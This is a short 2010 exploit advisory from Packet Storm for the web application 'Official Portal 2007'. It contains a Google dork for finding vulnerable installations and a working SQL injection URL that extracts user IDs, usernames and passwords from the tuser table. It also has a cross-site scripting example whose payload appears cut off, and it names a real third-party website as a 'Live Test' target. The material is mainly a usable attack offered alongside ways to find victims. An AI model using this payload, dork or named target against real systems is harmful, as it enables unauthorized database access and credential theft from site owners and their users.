Official Portal 2007 Cross Site Scripting / SQL Injection

2010-02-23T00:00:00
ID PACKETSTORM:86540
Type packetstorm
Reporter Pouya Daneshmand
Modified 2010-02-23T00:00:00

Description

                                        
                                            `  
  
#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: Official Portal 2007  
#################################################################  
# Vulnerability Info:  
# Type: Sql Injection/XSS  
# Risk: Medium  
# Dork: "Official Portal 2007"  
#################################################################  
Vulnerability:  
=======================  
Sql Injection  
=======================  
http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--  
=======================  
Cross Site Scripting  
=======================  
http://site.com/?fa=  
  
#################################################################  
Live Test: http://www.bkd-bandungkab.com  
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com  
###################################################################  
  
  
  
  
  
`